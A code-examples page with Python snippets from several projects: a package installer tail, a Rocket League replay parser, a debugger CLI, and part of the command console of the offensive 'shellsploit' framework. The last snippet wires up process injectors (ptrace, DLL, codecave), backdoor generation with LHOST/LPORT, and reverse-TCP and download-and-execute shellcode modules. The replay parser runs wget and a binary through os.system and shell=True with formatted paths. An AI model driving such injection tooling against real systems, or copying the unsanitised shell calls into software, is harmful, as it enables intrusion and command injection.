        # important to keep this here so it can be known what has previously been installed, so as to not turn on a 2nd version of a package.
        everything_already_installed = utils.all_pkgs_and_branches_for_all_pkg_types_already_installed(installed_pkgs_dir)
        pkg_inst.install(args.pkg_to_install, args, noise, everything_already_installed=everything_already_installed)

Example 46

Project: rocket-league-replays
Source File: parser.py
View license
def parse_replay_netstream(replay_id):
    from .models import PLATFORMS, BoostData, Goal, Player, Replay

    replay_obj = Replay.objects.get(pk=replay_id)

    try:
        if settings.DEBUG:
            if not os.path.isfile(replay_obj.file.path):
                # Download the file.
                command = 'wget https://media.rocketleaguereplays.com/{} -qO {}'.format(
                    replay_obj.file.name,
                    replay_obj.file.path,
                )

                os.system(command)

            replay = json.loads(subprocess.check_output('octane-binaries/octane-*-osx {}'.format(replay_obj.file.path), shell=True).decode('utf-8'))
        else:
            replay = json.loads(subprocess.check_output('octane-binaries/octane-*-linux {}'.format(replay_obj.file.url), shell=True).decode('utf-8'))
    except subprocess.CalledProcessError:
        # Parsing the file failed.
        replay_obj.processed = False
        replay_obj.save()
        return

    replay_obj, replay = _parse_header(replay_obj, replay)

    goals = {
        goal['frame']['Value']: {'PlayerName': goal['PlayerName']['Value'], 'PlayerTeam': goal['PlayerTeam']['Value']}
        for goal in replay['Metadata'].get('Goals', {'Value': []})['Value']
    }

    last_hits = {
        0: None,
        1: None
    }

    actors = {}  # All actors
    player_actors = {}  # XXX: This will be used to make the replay.save() easier.
    goal_actors = {}
    team_data = {}
    actor_positions = {}  # The current position data for all actors. Do we need this?
    player_cars = {}  # Car -> Player actor ID mappings.
    ball_angularvelocity = None  # The current angular velocity of the ball.
    ball_possession = None  # The team currently in possession of the ball.
    cars_frozen = False  # Whether the cars are frozen in place (3.. 2.. 1..)
    shot_data = []  # The locations of the player and the ball when goals were scored.
    unknown_boost_data = {}  # Holding dict for boosts without player data.
    ball_actor_id = None

    location_data = []  # Used for the location JSON.
    boost_data = {}  # Used for the boost stats.
    boost_objects = []
    heatmap_data = {}
    seconds_mapping = {}  # Frame -> seconds remaining mapping.

    heatmap_json_filename = 'uploads/replay_json_files/{}.json'.format(replay_obj.replay_id)
    location_json_filename = 'uploads/replay_location_json_files/{}.json'.format(replay_obj.replay_id)

    for index, frame in enumerate(replay['Frames']):
        # Add an empty location list for this frame.
        location_data.append([])

        ball_hit = False
        confirmed_ball_hit = False
        ball_spawned = False

        if index in goals:
            # Get the ball position.
            ball_actor_id = list(filter(lambda x: actors[x]['Class'] == 'TAGame.Ball_TA', actors))[0]
            ball_position = actor_positions[ball_actor_id]

            # XXX: Update this to also register the hitter?
            hit_position = last_hits[goals[index]['PlayerTeam']]

            shot_data.append({
                'player': hit_position,
                'ball': ball_position,
                'frame': index
            })

            # Reset the last hits.
            last_hits = {
                0: None,
                1: None
            }

        # Handle any new actors.
        for actor_id, value in frame['Spawned'].items():
            actor_id = int(actor_id)

            if actor_id not in actors:
                actors[actor_id] = value

            if 'Engine.Pawn:PlayerReplicationInfo' in value:
                player_actor_id = value['Engine.Pawn:PlayerReplicationInfo']['Value'][1]
                player_cars[player_actor_id] = actor_id

            if value['Class'] == 'TAGame.Ball_TA':
                ball_spawned = True

            if value['Class'] == 'TAGame.PRI_TA':
                player_actors[actor_id] = value
                player_actors[actor_id]['joined'] = index

            if value['Class'] == 'TAGame.Team_Soccar_TA':
                team_data[actor_id] = value['Name'].replace('Archetypes.Teams.Team', '')

        # Handle any updates to existing actors.
        for actor_id, value in frame['Updated'].items():
            actor_id = int(actor_id)

            if 'Engine.PlayerReplicationInfo:Team' in value and not value['Engine.PlayerReplicationInfo:Team']['Value']['Int']:
                del value['Engine.PlayerReplicationInfo:Team']

            # Merge the new properties with the existing.
            if actors[actor_id] != value:
                actors[actor_id] = {**actors[actor_id], **value}

                if actor_id in player_actors:
                    player_actors[actor_id] = actors[actor_id]

            if 'Engine.Pawn:PlayerReplicationInfo' in value:
                player_actor_id = value['Engine.Pawn:PlayerReplicationInfo']['Value']['Int']
                player_cars[player_actor_id] = actor_id

        # Handle removing any destroyed actors.
        for actor_id in frame['Destroyed']:
            del actors[actor_id]

            if actor_id in player_actors:
                player_actors[actor_id]['left'] = index

        # Loop over actors which have changed in this frame.
        for actor_id, value in {**frame['Spawned'], **frame['Updated']}.items():
            actor_id = int(actor_id)

            # Look for any position data.
            if 'TAGame.RBActor_TA:ReplicatedRBState' in value:
                actor_positions[actor_id] = value['TAGame.RBActor_TA:ReplicatedRBState']['Value']['Position']

                # Get the player actor id.
                real_actor_id = actor_id

                for player_actor_id, car_actor_id in player_cars.items():
                    if actor_id == car_actor_id:
                        real_actor_id = player_actor_id
                        break

                if real_actor_id == actor_id:
                    real_actor_id = 'ball'

                data_dict = {'id': real_actor_id}
                data_dict['x'], data_dict['y'], data_dict['z'] = value['TAGame.RBActor_TA:ReplicatedRBState']['Value']['Position']
                data_dict['yaw'], data_dict['pitch'], data_dict['roll'] = value['TAGame.RBActor_TA:ReplicatedRBState']['Value']['Rotation']
                location_data[index].append(data_dict)

            # If this property exists, the ball has changed possession.
            if 'TAGame.Ball_TA:HitTeamNum' in value:
                ball_hit = confirmed_ball_hit = True
                hit_team_num = value['TAGame.Ball_TA:HitTeamNum']['Value']
                ball_possession = hit_team_num

                # Clean up the actor positions.
                actor_positions_copy = actor_positions.copy()
                for actor_position in actor_positions_copy:
                    found = False

                    for car in player_cars:
                        if actor_position == player_cars[car]:
                            found = True

                    if not found and actor_position != ball_actor_id:
                        del actor_positions[actor_position]

            # Store the boost data for each actor at each frame where it changes.
            if 'TAGame.CarComponent_Boost_TA:ReplicatedBoostAmount' in value:
                boost_value = value['TAGame.CarComponent_Boost_TA:ReplicatedBoostAmount']['Value']
                assert 0 <= boost_value <= 255, 'Boost value {} is not in range 0-255.'.format(boost_value)

                if actor_id not in boost_data:
                    boost_data[actor_id] = {}

                # Sometimes we have a boost component without a reference to
                # a car. We don't want to lose that data, so stick it into a
                # holding dictionary until we can figure out who it belongs to.

                if 'TAGame.CarComponent_TA:Vehicle' not in actors[actor_id]:
                    if actor_id not in unknown_boost_data:
                        unknown_boost_data[actor_id] = {}

                    unknown_boost_data[actor_id][index] = boost_value
                else:
                    car_id = actors[actor_id]['TAGame.CarComponent_TA:Vehicle']['Value']['Int']

                    # Find out which player this car belongs to.
                    try:
                        player_actor_id = [
                            player_actor_id
                            for player_actor_id, car_actor_id in player_cars.items()
                            if car_actor_id == car_id
                        ][0]

                        if player_actor_id not in boost_data:
                            boost_data[player_actor_id] = {}

                        boost_data[player_actor_id][index] = boost_value

                        # Attach any floating data (if we can).
                        if actor_id in unknown_boost_data:
                            for frame_index, boost_value in unknown_boost_data[actor_id].items():
                                boost_data[player_actor_id][frame_index] = boost_value

                            del unknown_boost_data[actor_id]

                    except IndexError:
                        pass

            # Store the mapping of frame -> clock time.
            if 'TAGame.GameEvent_Soccar_TA:SecondsRemaining' in value:
                seconds_mapping[index] = value['TAGame.GameEvent_Soccar_TA:SecondsRemaining']['Value']

            # See if the cars are frozen in place.
            if 'TAGame.GameEvent_TA:ReplicatedGameStateTimeRemaining' in value:
                if value['TAGame.GameEvent_TA:ReplicatedGameStateTimeRemaining']['Value'] == 3:
                    cars_frozen = True
                elif value['TAGame.GameEvent_TA:ReplicatedGameStateTimeRemaining']['Value'] == 0:
                    cars_frozen = False

            # Get the camera details.
            if 'TAGame.CameraSettingsActor_TA:ProfileSettings' in value:
                if actors[actor_id]['Class'] == 'TAGame.CameraSettingsActor_TA':
                    # Define some short variable names to stop the next line
                    # being over 200 characters long.  This block of code
                    # makes new replays have a camera structure which is
                    # similar to that of the old replays - where the camera
                    # settings are directly attached to the player rather
                    # than a CameraActor (which is what the actor in this
                    # current loop is).

                    csa = 'TAGame.CameraSettingsActor_TA:PRI'
                    ps = 'TAGame.CameraSettingsActor_TA:ProfileSettings'
                    cs = 'TAGame.PRI_TA:CameraSettings'

                    if csa in value:
                        player_actor_id = value[csa]['Value']['Int']
                        actors[player_actor_id][cs] = value[ps]['Value']

            if 'Engine.GameReplicationInfo:ServerName' in value:
                replay_obj.server_name = value['Engine.GameReplicationInfo:ServerName']['Value']

            if 'ProjectX.GRI_X:ReplicatedGamePlaylist' in value:
                replay_obj.playlist = value['ProjectX.GRI_X:ReplicatedGamePlaylist']['Value']

            if 'TAGame.GameEvent_Team_TA:MaxTeamSize' in value:
                replay_obj.team_sizes = value['TAGame.GameEvent_Team_TA:MaxTeamSize']['Value']

            if 'TAGame.PRI_TA:MatchGoals' in value:
                # Get the closest goal to this frame.
                goal_actors[index] = actor_id

            if 'Engine.TeamInfo:Score' in value:
                if index not in goal_actors:
                    goal_actors[index] = actor_id

        # Work out which direction the ball is travelling and if it has
        # changed direction or speed.
        ball = None
        ball_actor_id = None
        for actor_id, value in actors.items():
            if value['Class'] == 'TAGame.Ball_TA':
                ball_actor_id = actor_id
                ball = value
                break

        ball_hit = False

        # Take a look at the ball this frame, has anything changed?
        if ball and 'TAGame.RBActor_TA:ReplicatedRBState' in ball:
            new_ball_angularvelocity = ball['TAGame.RBActor_TA:ReplicatedRBState']['Value']['AngularVelocity']

            # The ball has *changed direction*, but not necessarily been hit (it
            # may have bounced).

            if ball_angularvelocity != new_ball_angularvelocity:
                ball_hit = True

            ball_angularvelocity = new_ball_angularvelocity

            # Calculate the current distances between cars and the ball.
            # Do we have position data for the ball?
            if ball_hit and not ball_spawned and ball_actor_id in actor_positions:

                # Iterate over the cars to get the players.
                lowest_distance = None
                lowest_distance_car_actor = None

                for player_id, car_actor_id in player_cars.items():
                    # Get the team.
                    if (
                        player_id in actors and
                        'Engine.PlayerReplicationInfo:Team' in actors[player_id] and
                        actors[player_id]['Engine.PlayerReplicationInfo:Team']['Value']['Int']
                    ):
                        team_id = actors[player_id]['Engine.PlayerReplicationInfo:Team']['Value']['Int']

                        try:
                            team_actor = actors[team_id]
                            team = int(team_actor['Name'].replace('Archetypes.Teams.Team', ''))
                        except KeyError:
                            team = -1
                    else:
                        team = -1

                    # Make sure this actor is in on the team which is currently
                    # in possession.

                    if team != ball_possession:
                        continue

                    if car_actor_id in actor_positions:
                        actor_distance = distance(actor_positions[car_actor_id], actor_positions[ball_actor_id])

                        if not confirmed_ball_hit:
                            if actor_distance > 350:  # Value taken from the max confirmed distance.
                                continue

                        # Get the player on this team with the lowest distance.
                        if lowest_distance is None or actor_distance < lowest_distance:
                            lowest_distance = actor_distance
                            lowest_distance_car_actor = car_actor_id

                if lowest_distance_car_actor:
                    last_hits[ball_possession] = actor_positions[lowest_distance_car_actor]

        # Generate the heatmap data for this frame.  Get all of the players
        # and the ball.
        if not cars_frozen:
            moveable_actors = [
                (actor_id, value)
                for actor_id, value in actors.items()
                if value['Class'] in ['TAGame.Ball_TA', 'TAGame.PRI_TA', 'TAGame.Car_TA'] and
                (
                    'TAGame.RBActor_TA:ReplicatedRBState' in value or
                    'Position' in value
                )
            ]

            for actor_id, value in moveable_actors:
                if value['Class'] == 'TAGame.Ball_TA':
                    actor_id = 'ball'
                elif value['Class'] == 'TAGame.Car_TA':
                    if 'Engine.Pawn:PlayerReplicationInfo' not in value:
                        continue

                    actor_id = value['Engine.Pawn:PlayerReplicationInfo']['Value']['Int']

                if 'TAGame.RBActor_TA:ReplicatedRBState' in value:
                    key = '{},{}'.format(
                        value['TAGame.RBActor_TA:ReplicatedRBState']['Value']['Position'][0],
                        value['TAGame.RBActor_TA:ReplicatedRBState']['Value']['Position'][1],
                    )
                elif 'Position' in value:
                    key = '{},{}'.format(
                        value['Position'][0],
                        value['Position'][1],
                    )

                if actor_id not in heatmap_data:
                    heatmap_data[actor_id] = {}

                if key in heatmap_data[actor_id]:
                    heatmap_data[actor_id][key] += 1
                else:
                    heatmap_data[actor_id][key] = 1

Example 47

Project: python2-trepan
Source File: cli.py
View license
def main(dbg=None, sys_argv=list(sys.argv)):
    """Routine which gets run if we were invoked directly"""

    # Save the original just for use in the restart that works via exec.
    orig_sys_argv = list(sys_argv)
    opts, dbg_opts, sys_argv  = Moptions.process_options(__title__,
                                                         __version__,
                                                         sys_argv)
    if opts.server:
        connection_opts={'IO': 'TCP', 'PORT': opts.port}
        intf = Mserver.ServerInterface(connection_opts=connection_opts)
        dbg_opts['interface'] = intf
        if 'FIFO' == intf.server_type:
            print('Starting FIFO server for process %s.' % os.getpid())
        elif 'TCP' == intf.server_type:
            print('Starting TCP server listening on port %s.' %
                  intf.inout.PORT)
            pass
    elif opts.client:
        Mclient.main(opts, sys_argv)
        return

    dbg_opts['orig_sys_argv'] = orig_sys_argv

    if dbg is None:
        dbg = Mdebugger.Debugger(dbg_opts)
        dbg.core.add_ignore(main)
        pass
    Moptions._postprocess_options(dbg, opts)

    # process_options has munged sys.argv to remove any options that
    # options that belong to this debugger. The original options to
    # invoke the debugger and script are in global sys_argv

    if len(sys_argv) == 0:
        # No program given to debug. Set to go into a command loop
        # anyway
        mainpyfile = None
    else:
        mainpyfile = sys_argv[0]  # Get script filename.
        if not os.path.isfile(mainpyfile):
            mainpyfile=Mclifns.whence_file(mainpyfile)
            is_readable = Mfile.readable(mainpyfile)
            if is_readable is None:
                print("%s: Python script file '%s' does not exist"
                      % (__title__, mainpyfile,), file=sys.stderr)
                sys.exit(1)
            elif not is_readable:
                print("%s: Can't read Python script file '%s'"
                      % (__title__, mainpyfile, ), file=sys.stderr)
                sys.exit(1)
                return

        if Mfile.is_compiled_py(mainpyfile):
            try:
                from uncompyle6 import uncompyle_file
            except ImportError:
                print("%s: Compiled python file '%s', but uncompyle6 not found"
                    % (__title__, mainpyfile), file=sys.stderr)
                sys.exit(1)

            short_name = os.path.basename(mainpyfile).strip('.pyc')
            fd = tempfile.NamedTemporaryFile(suffix='.py',
                                             prefix=short_name + "_",
                                             delete=False)
            try:
                uncompyle_file(mainpyfile, fd)
            except:
                print("%s: error uncompyling '%s'"
                      % (__title__, mainpyfile), file=sys.stderr)
                sys.exit(1)
            mainpyfile = fd.name
            fd.close()

        # If mainpyfile is an optimized Python script try to find and
        # use non-optimized alternative.
        mainpyfile_noopt = Mfile.file_pyc2py(mainpyfile)
        if mainpyfile != mainpyfile_noopt \
               and Mfile.readable(mainpyfile_noopt):
            print("%s: Compiled Python script given and we can't use that."
                  % __title__, file=sys.stderr)
            print("%s: Substituting non-compiled name: %s" % (
                __title__, mainpyfile_noopt,), file=sys.stderr)
            mainpyfile = mainpyfile_noopt
            pass

        # Replace trepan's dir with script's dir in front of
        # module search path.
        sys.path[0] = dbg.main_dirname = os.path.dirname(mainpyfile)

    # XXX If a signal has been received we continue in the loop, otherwise
    # the loop exits for some reason.
    dbg.sig_received = False

    # if not mainpyfile:
    #     print('For now, you need to specify a Python script name!')
    #     sys.exit(2)
    #     pass

    while True:

        # Run the debugged script over and over again until we get it
        # right.

        try:
            if dbg.program_sys_argv and mainpyfile:
                normal_termination = dbg.run_script(mainpyfile)
                if not normal_termination: break
            else:
                dbg.core.execution_status = 'No program'
                dbg.core.processor.process_commands()
                pass

            dbg.core.execution_status = 'Terminated'
            dbg.intf[-1].msg("The program finished - quit or restart")
            dbg.core.processor.process_commands()
        except Mexcept.DebuggerQuit:
            break
        except Mexcept.DebuggerRestart:
            dbg.core.execution_status = 'Restart requested'
            if dbg.program_sys_argv:
                sys.argv = list(dbg.program_sys_argv)
                part1 = ('Restarting %s with arguments:' %
                         dbg.core.filename(mainpyfile))
                args  = ' '.join(dbg.program_sys_argv[1:])
                dbg.intf[-1].msg(Mmisc.wrapped_lines(part1, args,
                                                     dbg.settings['width']))
            else: break
        except SystemExit:
            # In most cases SystemExit does not warrant a post-mortem session.
            break
        except:
            # FIXME: Should be handled above without this mess
            exception_name = str(sys.exc_info()[0])
            if exception_name == str(Mexcept.DebuggerQuit):
                break
            elif exception_name == str(Mexcept.DebuggerRestart):
                dbg.core.execution_status = 'Restart requested'
                if dbg.program_sys_argv:
                    sys.argv = list(dbg.program_sys_argv)
                    part1 = ('Restarting %s with arguments:' %
                             dbg.core.filename(mainpyfile))
                    args  = ' '.join(dbg.program_sys_argv[1:])
                    dbg.intf[-1].msg(
                        Mmisc.wrapped_lines(part1, args,
                                            dbg.settings['width']))
                    pass
            else:
                raise
        pass

    # Restore old sys.argv
    sys.argv = orig_sys_argv
    return

Example 48

Project: shellsploit-framework
Source File: control.py
View license
    def control(self, string):
        bash = bcolors.OKBLUE + bcolors.UNDERLINE + "ssf" + bcolors.ENDC
        bash += ":"
        bash += bcolors.RED + string + bcolors.ENDC
        bash += bcolors.OKBLUE + " > " + bcolors.ENDC

        try:
            terminal = raw_input(bash)
        except KeyboardInterrupt:
            B3mB4m.exit("\n[*] (Ctrl + C ) Detected, Trying To Exit ...")

        # Injectors
        if string[:9] == "injectors":
            tab.completion("injectors")
            if terminal[:4] == "help":
                from .core.help import injectorhelp
                injectorhelp()
                self.control(string)

            elif terminal[:4] == "back":
                self.argvlist = ["None", "None", "None", "None"]
                pass

            # elif terminal[:9] == "need help":
                # import XX
                # print youtubelink for this module

            elif terminal[:4] == "exit":
                B3mB4m.exit("\nThanks for using shellsploit !\n")    

            elif terminal[:4] == "pids":
                B3mB4m.pids("wholelist")
                self.control(string)

            elif terminal[:6] == "getpid":
                B3mB4m.pids(None, terminal[7:])
                self.control(string)

            elif terminal[:5] == "clear":
                B3mB4m.clean()
                self.control(string)

            elif terminal[:5] == "unset":
                if string in B3mB4m.bfdlist():
                    if terminal[6:] == "exe" or terminal[6:] == "file":
                        self.argvlist[0] = "None"   
                    elif terminal[6:] == "host":
                        self.argvlist[1] = "None"
                    elif terminal[6:] == "port":
                        self.argvlist[2] = "None"
                    else:
                        print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)                      

                elif string == "injectors/Windows/x86/tLsInjectorDLL":
                    if terminal[6:] == "exe":
                        self.argvlist[0] = "None"   
                    elif terminal[6:] == "dll":
                        self.argvlist[1] = "None"
                    else:
                        print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)   
                elif string == "injectors/Windows/x86/CodecaveInjector":
                    if terminal[6:] == "exe":
                        self.argvlist[0] = "None"
                    elif terminal[6:] == "shellcode":
                        self.argvlist[1] = "None"                 
                else:
                    if terminal[6:] == "pid":
                        self.argvlist[0] = "None"   
                    elif terminal[6:] == "shellcode":
                        self.argvlist[1] = "None"
                    else:
                        print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
                self.control(string)

            elif terminal[:3] == "set":
                if string in B3mB4m.bfdlist():
                    if terminal[4:7] == "exe" or terminal[4:8] == "file":
                        self.argvlist[0] = terminal[9:]
                    elif terminal[4:8] == "host":
                        self.argvlist[1] = terminal[9:]
                    elif terminal[4:8] == "port":
                        self.argvlist[2] = terminal[9:]
                    else:
                        if not terminal:
                            self.control(string)
                        else:
                            print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)

                elif string == "injectors/Windows/x86/tLsInjectorDLL":
                    if terminal[4:7] == "exe":
                        self.argvlist[0] = terminal[8:]
                    elif terminal[4:7] == "dll":
                        self.argvlist[1] = terminal[8:]
                    else:
                        if not terminal:
                            self.control(string)
                        else:
                            print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)

                elif string == "injectors/Windows/x86/CodecaveInjector":
                    if terminal[4:7] == "exe":
                        self.argvlist[0] = terminal[8:]
                    elif terminal[4:13] == "shellcode":
                        self.argvlist[1] = terminal[14:]
                    else:
                        if not terminal:
                            self.control(string)
                        else:
                            print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)

                else:
                    if terminal[4:7] == "pid":
                        self.argvlist[0] = terminal[8:]
                    elif terminal[4:13] == "shellcode":
                        if ".txt" in terminal[14:]:
                            if os.path.isfile(terminal[14:]):
                                with open(terminal[14:], "r") as shellcode:
                                    cache = shellcode.readlines()   
                                    db = ""
                                    for x in database:
                                        db += x.strip().replace('"', "").replace('+', "").strip()
                                    self.argvlist[1] = db
                            else:
                                print(bcolors.RED + bcolors.BOLD + "\nFile can't find, please try with full path.\n" + bcolors.ENDC)
                                self.control(string)
                        else:
                            self.argvlist[1] = terminal[14:]
                    else:
                        if not terminal:
                            self.control(string)
                        else:
                            print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
                self.control(string)

            elif terminal[:14] == "show shellcode":
                if string in B3mB4m.bfdlist():
                    print("This option not available for this module.")
                    self.control(string)
                elif string == "injectors/Windowsx86/tLsInjectorDLL":
                    self.control(string)
                else:
                    if self.argvlist[1] != "None":
                        B3mB4m.prettyout(self.argvlist[1])
                    else:
                        print("\nYou must set shellcode before this ..\b")
                    self.control(string)

            elif terminal[:12] == "show options":
                from .core.Injectoroptions import controlset
                if string in B3mB4m.bfdlist():
                    controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
                    self.control(string)
                else:
                    if string != "injectors/Windows/x86/tLsInjectorDLL":
                        if self.argvlist[1] != "None":
                            self.mycache = "process"
                            controlset(string, self.argvlist[0], self.mycache)
                            self.control(string)
                    controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

            elif terminal[:5] == "clear":
                B3mB4m.clean()
                self.control(string)   

            elif terminal[:2] == "os":
                B3mB4m.oscommand(terminal[3:])
                self.control(string)

            elif terminal[:6] == "inject":
                if self.argvlist[0] == None or self.argvlist[1] == None:
                    print("\nYou must set pid/shellcode before inject !\n")
                    self.control(string)
                if string == "injectors/Linux86/ptrace":
                    from .inject.menager import linux86ptrace
                    linux86ptrace(self.argvlist[0], self.argvlist[1])
                elif string == "injectors/Linux64/ptrace":
                    from .inject.menager import linux64ptrace
                    linux64ptrace(self.argvlist[0], self.argvlist[1])                  
                elif string == "injectors/Windows/byteman":
                    from .inject.menager import windows
                    windows(self.argvlist[0], self.argvlist[1])
                elif string == "injectors/Windows/x86/tLsInjectorDLL":
                    from .inject.menager import winx86tLsDLL
                    winx86tLsDLL(self.argvlist[0], self.argvlist[1])
                elif string == "injectors/Windows/x86/CodecaveInjector":
                    from .inject.menager import winx86Codecave
                    winx86Codecave(self.argvlist[0], self.argvlist[1])
                elif string == "injectors/Windows/Dllinjector":
                    from .inject.menager import winDLL
                    winDLL(self.argvlist[0], self.argvlist[1])        

                elif string == "injectors/Windows/BFD/Patching":
                    from .inject.menager import winBFD
                    winBFD(self.argvlist[0], self.argvlist[1], int(self.argvlist[2]))

                # elif string == "injectors/MacOSX/BFD/Patching":
                    # from .inject.menager import MacBFD
                    # MacBFD( FILE, HOST, PORT)          

                # elif string == "injectors/Linux/BFD/Patching":
                    # from .inject.menager import LinuxBFD
                    # LinuxBFD( FILE, HOST, PORT)

                # elif string == "injectors/Linux/ARM/x86/BFD/Patching":
                    # from .inject.menager import LinuxARMx86BFD
                    # LinuxARMx86BFD( FILE, HOST, PORT)                    

                # elif string == "FreeBSD/x86/BFD/Patching":
                    # from .inject.menager import FreeBSDx86
                    # FreeBSDx86( FILE, HOST, PORT)                    

                self.control(string)

            # elif terminal[:7] == "extract":
                # Future option
                # Make it executable (Dynamic virus land)
                # from bla bla import executable
                # generator()

            elif terminal[:4] == "back":
                self.argvlist = ["None", "None", "None", "None"]
                pass

            else:
                if not terminal:
                    self.control(string)
                else:
                    print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
                    self.control(string)

        # Backdoors
        elif string[:9] == "backdoors":
            tab.completion("backdoors")
            if terminal[:4] == "help":
                from .core.help import backdoorshelp
                backdoorshelp()
                self.control(string)

            elif terminal[:4] == "exit":
                B3mB4m.exit("\nThanks for using shellsploit !\n")

            elif terminal[:2] == "os":
                B3mB4m.oscommand(terminal[3:])
                self.control(string)

            elif terminal[:12] == "show options":       
                from .core.SHELLoptions import controlset
                controlset(string, self.argvlist[0], self.argvlist[1])
                self.control(string)

            elif terminal[:5] == "unset":
                if terminal[6:] == "lhost":
                    self.argvlist[0] = "None"   
                elif terminal[6:] == "lport":
                    self.argvlist[1] = "None"
                # elif terminal[6:] == "encoder":
                    # self.argvlist[2] = "None"
                else:
                    print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
                self.control(string)

            elif terminal[:3] == "set": 
                if terminal[4:9].lower() == "lhost":
                    self.argvlist[0] = terminal[10:]
                elif terminal[4:9].lower() == "lport":
                    self.argvlist[1] = terminal[10:]
                # elif terminal[4:11].lower() == "encoder"
                    # self.argvlist[2] = terminal[11:]
                else:
                    print(bcolors.RED + bcolors.BOLD + "This option is not available." + bcolors.ENDC)
                self.control(string)

            elif terminal[:8] == "generate":
                from .Session.generator import process
                # Custom output path will be add .. 
                if self.argvlist[0] == "None" or self.argvlist[1] == "None":
                    print("\nSet options before generate payload.\n")
                    self.control(string)
                else:
                    process(data=string, HOST=self.argvlist[0], PORT=self.argvlist[1], ENCODER=False, logger=True)
                    self.control(string)

            elif terminal[:5] == "clear":
                B3mB4m.clean()
                self.control(string)

            elif terminal[:4] == "back":
                self.argvlist = ["None", "None", "None", "None"]
                pass

            else:
                if not terminal:
                    self.control(string)
                else:
                    print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
                    self.control(string)

        # Shellcodes
        else:
            tab.completion("shellcodes")
            if terminal[:4] == "help":
                # if terminal[5:11] == "output":
                    # from Outputs.exehelp import help
                    # print help()
                    # self.control( string)
                from .core.help import shellcodehelp
                shellcodehelp()
                self.control(string)

            elif terminal[:2] == "os":
                B3mB4m.oscommand(terminal[3:])
                self.control(string)

            elif terminal[:4] == "back":
                self.argvlist = ["None", "None", "None", "None"]
                pass

            elif terminal[:4] == "exit":
                B3mB4m.exit("\nThanks for using shellsploit !\n")

            elif terminal[:10] == "whatisthis":
                from .core.whatisthis import whatisthis
                if "egg" in string:
                    message = "Egg-hunt"
                elif "tcp" in string or "reverse" in string or "netcat" in string:
                    message = "Remote"
                elif "download" in string:
                    message = "Download and execute"
                else:
                    message = "Local"
                # Add special part for particul
                whatisthis(message)
                self.control(string)

            elif terminal[:5] == "unset":
                if terminal[6:] == "encoder":
                    self.argvlist[0] = "None"   
                elif terminal[6:] == "iteration":
                    self.argvlist[1] = "None"
                elif terminal[6:] == "file":
                    if string in B3mB4m.readlist():
                        self.argvlist[2] = "None"
                    else:
                        B3mB4m.invalidcommand()
                elif terminal[6:] == "port":
                    if string in B3mB4m.tcpbindlist() or string in B3mB4m.reversetcplist():
                        self.argvlist[2] = "None"
                    else:
                        Base.invalidcommand()
                elif terminal[6:] == "command":
                    if string in B3mB4m.execlist():
                        self.argvlist[2] = "None"
                    else:
                        B3mB4m.invalidcommand()
                elif terminal[6:] == "link":
                    if string in B3mB4m.downloadandexecutelist():
                        self.argvlist[2] = "None"
                    else:
                        B3mB4m.invalidcommand()			
                elif terminal[6:] == "filename":
                    if string in B3mB4m.downloadandexecutelist():
                        self.argvlist[3] = "None"
                    else:
                        B3mB4m.invalidcommand()	
                elif terminal[6:] == "host":
                    if string in B3mB4m.reversetcplist():
                        self.argvlist[3] = "None"
                    else:
                        B3mB4m.invalidcommand()	
                else:
                    B3mB4m.invalidcommand()
                self.control(string)

            elif terminal[:3] == "set":
                if terminal[4:8] == "file":
                    if string in B3mB4m.readlist():
                        self.argvlist[2] = terminal[9:]
                    else:
                        B3mB4m.invalidcommand()   
                elif terminal[4:8] == "port":
                    if string in B3mB4m.tcpbindlist() or string in B3mB4m.reversetcplist():
                        self.argvlist[2] = terminal[9:]
                    else:
                        B3mB4m.invalidcommand()   
                elif terminal[4:11] == "command":
                    if string in B3mB4m.execlist():
                        self.argvlist[2] = terminal[12:]
                    else:
                        B3mB4m.invalidcommand()   
                elif terminal[4:8] == "link":
                    if string in B3mB4m.downloadandexecutelist():
                        self.argvlist[2] = terminal[9:]
                    else:
                        B3mB4m.invalidcommand()   
                elif terminal[4:11] == "message":
                    if string in B3mB4m.messageboxlist():
                        self.argvlist[2] = terminal[12:]
                    else:
                        B3mB4m.invalidcommand()   
                elif terminal[4:8] == "host":
                    if string in B3mB4m.reversetcplist():
                        self.argvlist[3] = terminal[9:]
                    else:
                        B3mB4m.invalidcommand()
                elif terminal[4:12] == "filename":
                    if string in B3mB4m.downloadandexecutelist():
                        self.argvlist[3] = terminal[13:]
                    else:
                        B3mB4m.invalidcommand()					
                elif terminal[4:11] == "encoder":
                    from .core.lists import encoders
                    if terminal[12:] not in encoders():
                        print("This encoder not in list !")
                        self.control(string)
                    self.argvlist[0] = terminal[12:]
                elif terminal[4:13] == "iteration":
                    self.argvlist[1] = terminal[14:]
                else:
                    B3mB4m.invalidcommand()     
                self.control(string)   

            elif terminal[:12] == "show options":
                from .core.SHELLoptions import controlset
                if string[:7] == "linux86":
                    if string == "linux86/read":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux86/chmod":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux86/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux86/reverse_tcp":
                        controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux86/download&exec":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux86/exec":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:10] == "solarisx86":
                    if string == "solarisx86/read":
